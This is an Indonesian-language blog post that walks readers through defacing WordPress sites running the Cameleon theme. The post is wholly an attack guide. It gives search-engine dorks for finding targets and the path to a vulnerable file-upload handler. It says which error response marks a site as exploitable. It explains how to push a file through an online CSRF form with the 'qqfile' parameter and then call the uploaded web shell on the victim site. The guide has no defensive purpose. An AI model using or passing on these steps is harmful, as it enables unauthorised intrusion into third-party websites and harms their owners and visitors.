Assalamualaikum sterQ! Disini gwe bagikan metode deface poc themes camelon! Yups kalian pasti dah ngerti tentang depes depesan :V dah cuss lanjut cok.
Pertama yang kita butuhkan adalah dork! Woiya wajib :)
Langkah pertama kalian dorking dulu dikolom search gugel
Dork :
index of /themes/camelon
inurl:/wp-content/themes/camelon
Exploit :/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Kedua kalian masukin Exploitnya
dibelakang webnya contoh
www.sayangkamu.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Jika Muncul Tulisan {error":"No files were uploaded"} ini Vuln cok!
Lihat gambar dibawah :
Nah disini saatnya kita masuk ke csrf online dan isi Post Filenya "qqfile" dan klik "kunci target & upload file kalian
Csrf Online Klik Disini
Jika sukses akan muncul tampilan seperti ini :
Saatnya panggil script kalian contoh
www.akusayangkamu.com/wp-content/uploads/2019/09/shellkamu.php
Done hehe yakan? Support terus blog ini sampe maju ster!
0 Comments